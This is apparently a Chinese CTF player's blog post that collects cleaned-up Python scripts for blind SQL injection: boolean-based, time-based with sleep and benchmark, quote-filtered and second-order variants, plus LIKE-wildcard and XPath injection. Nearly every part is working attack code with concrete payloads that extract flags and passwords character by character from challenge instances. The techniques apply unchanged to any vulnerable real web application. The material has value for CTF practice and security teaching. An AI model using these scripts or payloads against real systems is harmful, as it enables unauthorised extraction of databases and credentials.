做过了这么多sql注入,把脚本整理一下 (Having worked through a fair number of SQL-injection challenges, here are the scripts, tidied up. Every target below is a CTF challenge instance; run these only against systems you are authorised to test.)
sql布尔盲注 (boolean-based blind SQL injection: the oracle is the page content, not response timing)
#普通脚本
'''
import requests
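# Character set for MySQL identifiers.  The original string was missing 'J'
# ("...GHIGK...") as well as digits and '_', so a schema name using any of
# them could never be recovered.
dic = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_'
database = ''
# Text the challenge page shows when the injected condition is true.
SUCCESS_MARKER = 'Hi admin, your score is: 100'
URL_TEMPLATE = "http://352fc37f-0497-4ec6-8b2a-c663a6d5e84e.node3.buuoj.cn/?stunum=1/**/&&/**/substr(database(),%d,1)='%c'--+"


def build_url(x, i, template=URL_TEMPLATE):
    """Return the probe URL asking whether character *x* (1-based) of database() equals *i*."""
    return template % (x, i)


def http_probe(url):
    """Fetch *url* and return True when the page confirms the injected condition.

    The original swallowed every exception with a bare ``except: pass``, so a
    timeout was indistinguishable from "not this character"; a failed request
    is now reported and still counted as a miss.
    """
    try:
        response = requests.get(url, timeout=5)
    except requests.RequestException as exc:
        print('request failed: %s (%s)' % (url, exc))
        return False
    # response.content is bytes on Python 3; compare against the decoded body.
    return SUCCESS_MARKER in response.text


def extract_database(probe=http_probe, charset=dic, max_len=19):
    """Recover database() one character at a time through the boolean oracle *probe*.

    *probe* takes a URL and returns True/False.  Extraction stops at the first
    position where no character of *charset* matches (end of the name) instead
    of skipping the position and producing a misaligned result.
    """
    name = ''
    for x in range(1, max_len + 1):
        for i in charset:
            if probe(build_url(x, i)):
                name += i
                print(name)
                break
        else:
            break
    return name


if __name__ == '__main__':
    database = extract_database()
    print(database)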
import requests
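host = 'http://c120d287-dc5a-47a2-9b10-84c734cbee35.chall.ctf.show/index.php?id='
# Page text seen when the injected "ord(...) > N" predicate is true.
TRUE_MARKER = 'Child'
# Expressions used in the earlier stages of the same attack (results noted):
#   'database()'                                                                                              -> web1
#   '(select group_concat(table_name) from information_schema.tables where table_schema regexp database())'  -> flag,page,user
#   '(select group_concat(column_name) from information_schema.columns where table_name regexp 0x666c6167)'  -> FLAG_COLUMN,flag
BABYSELECT = '(select flag from flag)'
PREDICATE = "0 or ord(substr({} from {} for 1))>{}"


def mid(bot, top):
    """Midpoint of (bot, top], rounded down (same value as the original int(0.5 * (top + bot)))."""
    return (top + bot) // 2


def http_probe(select):
    """Send the predicate with spaces replaced by inline comments and report the oracle result."""
    r = requests.get(url=host + select.replace(' ', '/**/'), timeout=10)
    return TRUE_MARKER in r.text


def extract_char(j, babyselect, probe):
    """Bisect the code point of character *j* (1-based) of *babyselect*.

    Invariant: bot < ord(c) <= top.  Starting at bot = 0 instead of 32 lets the
    NUL that MySQL's substr yields past the end of the string come back as a
    value below 32, so the caller can tell "end of data" from a space.
    """
    bot, top = 0, 126
    while top - bot > 1:
        m = mid(bot, top)
        if probe(PREDICATE.format(babyselect, j, m)):
            bot = m
        else:
            top = m
    return top


def sqli(probe=http_probe, babyselect=BABYSELECT, max_len=249):
    """Dump *babyselect* character by character and return it.

    The original kept going for all 249 positions and padded the value with
    spaces once the real string ended; this stops at the first non-printable
    (end-of-string) character.
    """
    name = ''
    for j in range(1, max_len + 1):
        code = extract_char(j, babyselect, probe)
        if code < 32:
            break
        name += chr(code)
        print(name)
    return name


if __name__ == '__main__':
    sqli()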
'''
#[CISCN2019 华北赛区 Day2 Web1]Hack World
'''
import requests
import time
#url是随时更新的,具体的以做题时候的为准 (the instance URL changes on every start; paste the one from the running challenge)
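url = 'http://7558e160-ede8-4f30-a7da-6b5727376b56.node3.buuoj.cn/index.php'
data = {"id": ""}
flag = 'flag{'
# Page text seen when the injected if() resolves to id 1 (predicate true).
TRUE_MARKER = 'Hello'
PAYLOAD = "if(ascii(substr((select flag from flag),{},1))>{},1,2)"


def http_probe(payload, delay=1.0):
    """POST *payload* as the id field; True when the page confirms the predicate.

    *delay* keeps the original one-second pause between requests.
    """
    if delay:
        time.sleep(delay)
    data["id"] = payload
    r = requests.post(url, data=data, timeout=10)
    return TRUE_MARKER in r.text


def extract_char(i, probe):
    """Bisect ascii() of flag character *i* (1-based) over the printable range 32..126."""
    begin, end = 32, 126
    while begin < end:
        tmp = (begin + end) // 2
        if probe(PAYLOAD.format(i, tmp)):
            begin = tmp + 1   # ascii > tmp
        else:
            end = tmp         # ascii <= tmp
    return begin


def extract_flag(probe=http_probe, prefix='flag{', max_len=64):
    """Recover the flag after the known *prefix*, stopping at the closing '}'.

    The original looped forever when '}' never showed up (wrong marker, dead
    instance); *max_len* bounds the number of characters requested.
    """
    flag = prefix
    i = len(prefix) + 1
    while len(flag) < max_len:
        flag += chr(extract_char(i, probe))
        print(flag)
        if flag[-1] == '}':
            break
        i += 1
    return flag


if __name__ == '__main__':
    extract_flag()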
'''
# [CISCN2019 总决赛 Day2 Web1]Easyweb
'''
import requests
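url = "http://9ab2997c-d180-475a-997b-cd035771b930.node3.buuoj.cn/image.php"
result = ''
# image.php returns a real JPEG (body carries the JFIF marker) when the injected id is truthy.
TRUE_MARKER = b'JFIF'
# Earlier stages of the same attack, kept for reference:
#   " or id=if(ascii(substr((database()),%d,1))>%d,1,0)#"
#   " or id=if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),%d,1))>%d,1,0)#"   -> users
#   " or id=if(ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),%d,1))>%d,1,0)#"  -> password
PAYLOAD = " or id=if(ascii(substr((select password from users limit 0,1),%d,1))>%d,1,0)#"


def http_probe(payload):
    """Send the predicate through the `path` parameter and report whether an image came back."""
    params = {'id': '\\0', 'path': payload}
    response = requests.get(url, params=params, timeout=10)
    return TRUE_MARKER in response.content


def extract_char(x, probe):
    """Bisect ascii() of character *x* (1-based) over 0..127; returns 0 past the end of the value."""
    low, high = 0, 127
    while high > low:
        mid = (low + high) // 2
        if probe(PAYLOAD % (x, mid)):
            low = mid + 1
        else:
            high = mid
    return low


def extract(probe=http_probe, max_len=99):
    """Recover the targeted value one character at a time.

    Positions are 1-based: substr(s, 0, 1) is '' in MySQL, so the original
    range(0, 100) spent a whole bisection on a phantom first character.  The
    loop also stops when a position bisects to a non-printable code point,
    i.e. past the end of the value.
    """
    result = ''
    for x in range(1, max_len + 1):
        code = extract_char(x, probe)
        if code < 32:
            break
        result += chr(code)
        print(result)
    return result


if __name__ == '__main__':
    result = extract()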
'''
#[极客大挑战 2019]FinalSQL
'''
#二分法要快很多 (bisection needs about seven requests per character instead of one per candidate, so it is much faster)
# -*- coding: UTF-8 -*-
import re
import requests
import string
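url = "http://649d4d3a-b8a5-449d-82fa-aad24102ca6d.node3.buuoj.cn/search.php"
flag = ''
# Page text seen when 1^(pred)^1 leaves the id unchanged, i.e. the predicate is true.
TRUE_MARKER = "Click"
# Earlier stages of the same attack:
#   "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"                            -> schema names
#   "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"     -> table names
#   "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"  -> column names
SQL = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1"


def http_probe(sql):
    """GET the predicate as ?id= and report whether the page confirmed it (the original had no timeout)."""
    r = requests.get(url, params={"id": sql}, timeout=10)
    return TRUE_MARKER in r.text


def payload(i, j, probe=None):
    """Return 1 when ord(char i) > j according to the oracle, else 0 (original 1/0 contract kept)."""
    if probe is None:
        probe = http_probe
    return 1 if probe(SQL % (i, j)) else 0


def extract_char(i, probe=None):
    """Bisect ord() of character *i* (1-based) over 31..127.

    After the loop high == low - 1, so the original's (low + high + 1) // 2 is
    simply low.  31 means nothing was greater than 31 (NUL past the end);
    127 means everything was, which the caller treats as a stop as well.
    """
    low, high = 31, 127
    while low <= high:
        mid = (low + high) // 2
        if payload(i, mid, probe):
            low = mid + 1
        else:
            high = mid - 1
    return low


def exp(probe=None, max_len=9999):
    """Append recovered characters to the module-level `flag` and return it."""
    global flag
    for i in range(1, max_len + 1):
        print(i, ':')
        f = extract_char(i, probe)
        if f == 127 or f == 31:
            break
        flag += chr(f)
        print(flag)
    return flag


if __name__ == '__main__':
    exp()
    print('flag=', flag)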
'''
#[WUSTCTF2020]颜值成绩查询
'''
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#颖奇L'Amore www.gem-love.com #转载请勿删除水印
import requests
from urllib.parse import *
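res = ''
# Candidate characters.  The original list had 'G' twice and no 'J', so a
# flag containing 'J' would have stalled at that position.
alphabet = list('{}@_,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
# Earlier stages of the same attack (results in the trailing comment):
#   "select/**/group_concat(schema_name)/**/from/**/information_schema.schemata"                                   -> information_schema,ctf
#   "select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()"   -> flag,score
#   'select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()' -> flag,value,id,name,score
# Final stage result: wctf2020{e@sy_sq1_and_y0u_sc0re_1t}
PAYLOAD = "select/**/group_concat(value)/**/from/**/flag"
# stunum=2/(cond): the division only yields a usable number when the comparison
# holds, which is what the score check below keys on.
URL_TEMPLATE = 'http://101.200.53.102:10114/?stunum=2/(ascii(substr(({}),{},1))={})'
TRUE_MARKER = '666'


def build_url(payload, i, char):
    """Probe URL asking whether character *i* (1-based) of *payload*'s result is *char*."""
    return URL_TEMPLATE.format(quote(payload), i, ord(char))


def http_probe(url):
    """GET the probe URL and report whether the score page confirmed the guess."""
    r = requests.get(url, timeout=10)
    return TRUE_MARKER in r.text


def extract(probe=http_probe, payload=PAYLOAD, charset=alphabet, max_len=99):
    """Recover the query result one character at a time.

    Stops at the first position no candidate matches (end of the value, or a
    character outside *charset*) instead of continuing with a misaligned result.
    """
    res = ''
    for i in range(1, max_len + 1):
        for char in charset:
            if probe(build_url(payload, i, char)):
                res += char
                print(res)
                break
        else:
            break
    return res


if __name__ == '__main__':
    res = extract()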
'''
#[NCTF2019]SQLi
'''
import time
import string
import requests
from urllib import parse
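passwd = ''
# Candidate characters (lowercase, digits, '_').  Kept under a name that does
# not shadow the `string` module, which the original reassigned.
charset = string.ascii_lowercase + string.digits + '_'
url = 'http://fcffbbbf-04b1-48b1-b528-a4f6c010bb69.node3.buuoj.cn/'
TRUE_MARKER = 'welcome'
# "^prefix" anchors the regexp; the second slot carries a NUL to cut off the rest of the query.
PAYLOAD = "||/**/passwd/**/regexp/**/\"^{}\";{}"


def http_probe(prefix):
    """True when the login page accepts `passwd regexp "^prefix"`.

    NOTE(review): MySQL REGEXP on a non-binary column is case-insensitive, so
    a lowercase-only charset recovers the letters but not their case.  None of
    the charset characters are regex metacharacters, so no escaping is needed.
    """
    data = {
        "username": "\\",
        "passwd": PAYLOAD.format(prefix, parse.unquote('%00')),
    }
    res = requests.post(url, data=data, timeout=10)
    return TRUE_MARKER in res.text


def extract(probe=http_probe, charset=charset, max_len=100, delay=0.1):
    """Extend the password prefix one character at a time and return it.

    The original only left the inner loop when the last candidate failed and
    then re-issued the same requests for every remaining outer iteration; this
    stops as soon as a position has no matching candidate.
    """
    passwd = ''
    for _ in range(max_len):
        for m in charset:
            if delay:
                time.sleep(delay)
            print(passwd + m + '-' * 10)
            if probe(passwd + m):
                passwd += m
                print(m)
                break
        else:
            break
    print(passwd)
    return passwd


if __name__ == '__main__':
    passwd = extract()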
'''
#ctfshow web2_观星 _WEB_AK赛
'''
import requests
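url = "http://6d40c5f4-b306-43c2-b70d-342ca79ad9fd.chall.ctf.show/index.php?id=1^"
flag = ""
# 1^2 and 1^3 select different ids; this text is what the original script
# treats as the "guess confirmed" page.
TRUE_MARKER = "I asked nothing"
# Earlier stages of the same attack (results in the trailing comment):
#   "case(ord(substr(database()from({0})for(1))))when({1})then(2)else(3)end"                                                                                              -> web1
#   "case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(2)else(3)end"   -> flag, page, user
#   "case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({0})for(1))))when({1})then(2)else(3)end"  -> FLAG_COLUMN, flag
EXPR = "case(ord(substr((select(group_concat(flag))from(flag))from({0})for(1))))when({1})then(2)else(3)end"


def http_probe(expr):
    """GET id=1^<expr> and report whether the confirmation page came back."""
    r = requests.get(url + expr, timeout=100)
    return TRUE_MARKER in r.text


def extract(probe=http_probe, max_len=49, codes=range(32, 127)):
    """Recover the flag by testing each printable code point in turn.

    The original tried only 38..125, so space, !, ", #, $, % and ~ could never
    be found, and it kept going for all 49 positions after the value ended;
    this covers the whole printable range and stops at the first position
    with no match.
    """
    flag = ""
    for i in range(1, max_len + 1):
        print("i=" + str(i))
        for j in codes:
            if probe(EXPR.format(i, j)):
                flag += chr(j)
                print(flag)
                break
        else:
            break
    return flag


if __name__ == '__main__':
    flag = extract()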
'''
# 带上二分法 (with bisection) — this listing repeats the second script under the boolean-blind section above, unchanged.
'''
import requests
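host = 'http://c120d287-dc5a-47a2-9b10-84c734cbee35.chall.ctf.show/index.php?id='
# Page text seen when the injected "ord(...) > N" predicate is true.
TRUE_MARKER = 'Child'
# Expressions used in the earlier stages of the same attack (results noted):
#   'database()'                                                                                              -> web1
#   '(select group_concat(table_name) from information_schema.tables where table_schema regexp database())'  -> flag,page,user
#   '(select group_concat(column_name) from information_schema.columns where table_name regexp 0x666c6167)'  -> FLAG_COLUMN,flag
BABYSELECT = '(select flag from flag)'
PREDICATE = "0 or ord(substr({} from {} for 1))>{}"


def mid(bot, top):
    """Midpoint of (bot, top], rounded down (same value as the original int(0.5 * (top + bot)))."""
    return (top + bot) // 2


def http_probe(select):
    """Send the predicate with spaces replaced by inline comments and report the oracle result."""
    r = requests.get(url=host + select.replace(' ', '/**/'), timeout=10)
    return TRUE_MARKER in r.text


def extract_char(j, babyselect, probe):
    """Bisect the code point of character *j* (1-based) of *babyselect*.

    Invariant: bot < ord(c) <= top.  Starting at bot = 0 instead of 32 lets the
    NUL that MySQL's substr yields past the end of the string come back as a
    value below 32, so the caller can tell "end of data" from a space.
    """
    bot, top = 0, 126
    while top - bot > 1:
        m = mid(bot, top)
        if probe(PREDICATE.format(babyselect, j, m)):
            bot = m
        else:
            top = m
    return top


def sqli(probe=http_probe, babyselect=BABYSELECT, max_len=249):
    """Dump *babyselect* character by character and return it.

    The original kept going for all 249 positions and padded the value with
    spaces once the real string ended; this stops at the first non-printable
    (end-of-string) character.
    """
    name = ''
    for j in range(1, max_len + 1):
        code = extract_char(j, babyselect, probe)
        if code < 32:
            break
        name += chr(code)
        print(name)
    return name


if __name__ == '__main__':
    sqli()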
'''
# ctfshow web1_签到_内部赛
'''
import requests
import re
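url1 = "http://80aa5350-d5f9-478b-91e7-71cd1b0fec5b.chall.ctf.show/register.php"
url2 = "http://80aa5350-d5f9-478b-91e7-71cd1b0fec5b.chall.ctf.show/login.php"
flag = ''
# Second-order injection: the username stored at registration is the double
# hex() of one flag character; the login page then echoes it as "Hello <username>,".
PAYLOAD = "hex(hex(substr((select/**/flag/**/from/**/flag)from/**/{}/**/for/**/1))),/*"
HELLO = re.compile(r"Hello (.*?),")


def decode_char(real):
    """Undo the two server-side hex() layers: hex(hex('f')) == '3636' -> 'f'.

    Returns '' for an empty value (position past the end of the flag).
    """
    inner = bytes.fromhex(real).decode('ascii')
    return bytes.fromhex(inner).decode('utf-8', 'replace')


def fetch_char(i, account):
    """Register *account* with the injected username, log in, and return the
    raw echoed username — or None when no greeting was found (e.g. the
    registration was rejected).
    """
    s = requests.session()
    data1 = {
        'e': str(account) + "',username=" + PAYLOAD.format(i),
        'u': "*/#",
        'p': account,
    }
    s.post(url1, data=data1, timeout=10)
    r2 = s.post(url2, data={'e': account, 'p': account}, timeout=10)
    m = HELLO.search(r2.text)
    return None if m is None else m.group(1)


def extract(fetch=fetch_char, max_len=49, base=30):
    """Recover the flag and return it decoded.

    The original appended the double-hex value verbatim (so the result still
    had to be decoded by hand) and crashed with IndexError when the greeting
    was missing.  Each position registers the e-mail ``i + base``; bump *base*
    when re-running against an instance that already holds those accounts.
    """
    flag = ''
    raw = ''
    for i in range(1, max_len + 1):
        real = fetch(i, i + base)
        if real is None:
            print('no greeting for position', i, '- registration/login failed')
            break
        if real == '':
            break
        raw += real
        flag += decode_char(real)
        print(raw, '->', flag)
    return flag


if __name__ == '__main__':
    flag = extract()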
'''
# like 模糊测试脚本
'''
import requests
import string
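strs = string.digits + string.ascii_letters
url = 'http://01a0d419-a06a-48de-b123-a27b8703807e.chall.ctf.show/login.php'
pwd = ''
# The password is compared with LIKE; '_' is its single-character wildcard.
PWD_LEN = 32


def http_probe(password):
    """True when the login page does not reject the LIKE pattern *password*."""
    r = requests.post(url, data={'username': 'yu22x', 'password': password}, timeout=10)
    return 'wrong' not in r.text


def extract(probe=http_probe, charset=strs, length=PWD_LEN):
    """Recover a *length*-character password one position at a time.

    Each probe is prefix + candidate + '_' wildcards for the remaining length.
    Caveats: under a case-insensitive collation LIKE matches 'a' and 'A'
    alike, so the first case tried in *charset* wins; a literal '%' or '_' in
    the password cannot be matched this way.  The original kept probing later
    positions after one had no match; this stops instead.
    """
    pwd = ''
    for i in range(length):
        print('i = ' + str(i + 1), end='\t')
        for j in charset:
            password = pwd + j + (length - 1 - i) * '_'
            if probe(password):
                pwd += j
                print(pwd)
                break
        else:
            print('no candidate matched')
            break
    return pwd


if __name__ == '__main__':
    pwd = extract()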
'''
#xpath
'''
import requests
from urllib.parse import *
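res = ''
# Candidate characters.  The original list had 'G' twice and no 'J'.
alphabet = list('{}@_,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
# XPath injection: compare one character of the first user's password; the
# trailing "or ''=''" keeps the expression valid.  The submit value is the
# form's (double-encoded) button label and is sent exactly as captured.
URL_TEMPLATE = "http://114.55.165.246:8082/?username=%27or%20substring((/root/users[position()=1]/user[position()=1]/password),{},1)=%27{}%27%20or%20%27%27=%27&password=&submit=%C3%A7%C2%99%C2%BB%C3%A5%C2%BD%C2%95"
TRUE_MARKER = '登录成功you login as admin but username not admin'


def build_url(i, char):
    """Probe URL testing whether character *i* (1-based) of the password is *char*."""
    return URL_TEMPLATE.format(i, char)


def http_probe(url):
    """GET the probe URL and report whether the admin-login text appeared."""
    r = requests.get(url, timeout=10)
    return TRUE_MARKER in r.text


def extract(probe=http_probe, charset=alphabet, max_len=32):
    """Recover the password; stops at the first position with no matching candidate."""
    res = ''
    for i in range(1, max_len + 1):
        for char in charset:
            if probe(build_url(i, char)):
                res += char
                print(res)
                break
        else:
            break
    return res


if __name__ == '__main__':
    res = extract()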
'''
时间盲注 (time-based blind injection: the oracle is response latency, so server load or a slow link can produce false hits — re-check any doubtful character and keep a request timeout)
# coding:utf-8
import requests
import datetime
import time
# 获取长度
# def database_len():
# for i in range(1, 10):
# url = "http://challenge-658030cd43d1aad1.sandbox.ctfhub.com:10080/"
# payload = "?id=1 and if(length(database())>%d,sleep(3),0)" %i
# # print(url+payload+'%23')
# time1 = datetime.datetime.now()
# r = requests.get(url + payload + '%23')
# time2 = datetime.datetime.now()
# sec = (time2 - time1).seconds
# if sec >= 3:
# print(i)
# else:
# print("no")
# break
# print('database_len:', i)
#
#
# database_len()
#获取数据库名
# def database_name():
# name = ''
# for j in range(1, 9):
# for n in '0123456789abcdefghijklmnopqrstuvwxyz':
# url = "http://47.96.150.181:9004/"
# payload = "?username=0' or if(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),%d,1)='%s',sleep(5),1) or '1&password="% (j, n)
# # print(url+payload+'%23')
# time1 = datetime.datetime.now()
# r = requests.get(url + payload)
# time2 = datetime.datetime.now()
# sec = (time2 - time1).seconds
# if sec >= 5:
# name += n
# print(name)
# break
# print('database_name:', name)
#
#
# database_name()
#字典0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_:@#$%^{}
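CHARSET = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-:@#$%^{}'
URL = "http://47.96.150.181:9004/"
DELAY = 3
PAYLOAD = "?username=0' or if(substr((select flag from flag limit 0,1),%d,1)='%s',sleep(3),1) or '1&password="


def time_probe(payload, delay=DELAY):
    """True when the request took at least *delay* seconds (the injected sleep fired).

    Measured with a monotonic clock instead of datetime arithmetic whose
    .seconds truncates fractions.  A request that errors or exceeds the
    timeout is reported and counted as a miss — it is not evidence either
    way, so re-run that position.  NOTE(review): a slow non-matching response
    (server load, flaky link) still reads as a hit; confirm doubtful characters.
    """
    start = time.perf_counter()
    try:
        requests.get(URL + payload, timeout=delay * 3)
    except requests.RequestException as exc:
        print('request failed:', exc)
        return False
    return time.perf_counter() - start >= delay


def table_name(probe=time_probe, charset=CHARSET, max_len=49):
    """Recover the first row of flag.flag character by character and return it.

    (The author's name `table_name` is kept although the payload reads the
    flag column.)  The candidate is percent-encoded before being appended to
    the URL: '#' would otherwise start a URL fragment and '%' a percent
    escape, so those two charset entries could never match in the original.
    Stops at the first position without a match.
    """
    from urllib.parse import quote
    name = ''
    for j in range(1, max_len + 1):
        for n in charset:
            payload = PAYLOAD % (j, quote(n, safe=''))
            if probe(payload):
                name += n
                print(name)
                break
        else:
            break
    print('table_name:', name)
    return name


if __name__ == '__main__':
    table_name()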
#使用benchmark绕过盲注:
#coding:utf-8
import requests
import time
import datetime
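url = "http://121.196.108.136"
result = ''
# When the guessed code point is right the server burns CPU in benchmark()
# and the response is delayed; otherwise it returns at once.
PAYLOAD = "admin' and if((ascii(substr((select(group_concat(flag))from(flllllllaggggggg)),{},1)))={},benchmark(20000000,md5('aaa')),0)#"
THRESHOLD = 2


def time_probe(payload, threshold=THRESHOLD):
    """True when the POST took at least *threshold* seconds.

    The original subtracted int(time.time()) values, which truncates up to a
    full second and misreads responses near the threshold; this uses a
    monotonic float clock.  NOTE(review): benchmark() timing depends on
    server load, so confirm doubtful hits with a second run.
    """
    start = time.perf_counter()
    try:
        requests.post(url, data={'usname': payload, 'pswd': '123'}, timeout=threshold * 10)
    except requests.RequestException as exc:
        print('request failed:', exc)
        return False
    return time.perf_counter() - start >= threshold


def extract(probe=time_probe, max_len=99, codes=range(1, 127)):
    """Recover the value one character at a time and return it.

    Positions are 1-based (substr(s, 0, 1) is '' in MySQL, so the original's
    range(0, 100) wasted 126 timed requests on position 0).  Stops at the
    first position where no code point matches.
    """
    print('localhost-dvwa')
    result = ''
    for i in range(1, max_len + 1):
        for char in codes:
            if probe(PAYLOAD.format(i, char)):
                result += chr(char)
                print('Found: {}'.format(result))
                break
        else:
            break
    return result


if __name__ == '__main__':
    result = extract()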
# 过滤单引号的时间盲注
import requests
import time as t
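url = 'https://5bf6ae8e-105a-4a64-bb5c-80fc5fb8ff41.chall.ctf.show/index.php'
# Candidate characters.  The original list had 'G' twice and no 'J'.
alphabet = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
data = {
    'username': 'admin\\',
    'password': ''
}
result = ''
# Single quotes are filtered, so the prefix goes through REGEXP BINARY in
# double quotes; a match triggers sleep(4).
PAYLOAD = 'or/**/if((password/**/regexp/**/binary/**/"^{}"),sleep(4),1)#'
THRESHOLD = 3


def time_probe(prefix, threshold=THRESHOLD):
    """True when the login POST took at least *threshold* seconds (sleep fired).

    The original compared int(time.time()) values, which truncates up to a
    second; a monotonic float clock is used instead.  The charset is
    alphanumeric, so the prefix needs no regex escaping.
    """
    data['password'] = PAYLOAD.format(prefix)
    start = t.perf_counter()
    try:
        requests.post(url, data=data, timeout=threshold * 5)
    except requests.RequestException as exc:
        print('request failed:', exc)
        return False
    return t.perf_counter() - start >= threshold


def extract(probe=time_probe, charset=alphabet, max_len=20):
    """Extend the password prefix one character at a time and return it.

    Stops when no candidate matches (end of the value, or a character
    outside *charset*) instead of re-probing the same prefix.
    """
    result = ''
    for _ in range(max_len):
        for char in charset:
            if probe(result + char):
                result += char
                print(result)
                break
        else:
            break
    return result


if __name__ == '__main__':
    result = extract()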
# ctfshow web1_签到,过滤if,sleep的时间盲注
import requests
import time
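flag = ""
url = "https://fb01744a-0f92-44b7-8f74-fcaf576c1836.chall.ctf.show/register.php"
# if/sleep are filtered: a true CASE branch returns at once, the ELSE branch
# burns time in benchmark(), so "fast" means ord(char) > m.
THRESHOLD = 2
# Earlier stages of the same attack:
#   "0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0"  -> flag
#   "0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_name='flag'),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0"   -> flag
#   (variant when if/sleep are allowed) "or if(ascii(substr(username,{},1)) > {},1,sleep(2))#"
EXP = "0'/**/or/**/(select/**/case/**/when(ord(substr((select/**/group_concat(flag)from/**/flag),{},1))>{})then(1)else(benchmark(5000000,sha(1)))end)/**/or/**/'0"


def time_probe(exp, threshold=THRESHOLD):
    """True when the predicate inside *exp* held (the response came back quickly).

    Timed with a monotonic clock rather than time.time().  NOTE(review): a
    2 s benchmark is load-dependent — a slow "true" response flips the bit
    and corrupts the whole bisection for that character.
    """
    data = {"e": "cop\x40qq.com", "u": exp, "p": "123456"}
    start = time.perf_counter()
    requests.post(url, data=data, timeout=100)
    return time.perf_counter() - start < threshold


def extract_char(i, probe):
    """Bisect ord() of flag character *i* (1-based) over 0..127 in seven probes.

    Equivalent to the original m/j halving (64, then ±32, ±16, ...) written
    as a plain binary search: the answer is the smallest v for which
    ord(char) > v is false.
    """
    low, high = 0, 127
    while low < high:
        m = (low + high) // 2
        if probe(EXP.format(i, m)):
            low = m + 1
        else:
            high = m
    return low


def extract(probe=time_probe, positions=range(42, 44)):
    """Recover the flag characters at *positions* and return them.

    The default window is the author's ad-hoc range(42, 44); pass
    range(1, N) for the whole value.  Stops at a NUL past the end.
    """
    flag = ""
    for i in positions:
        print(i)
        code = extract_char(i, probe)
        if code == 0:
            break
        flag = flag + chr(code)
        print(flag)
    return flag


if __name__ == '__main__':
    flag = extract()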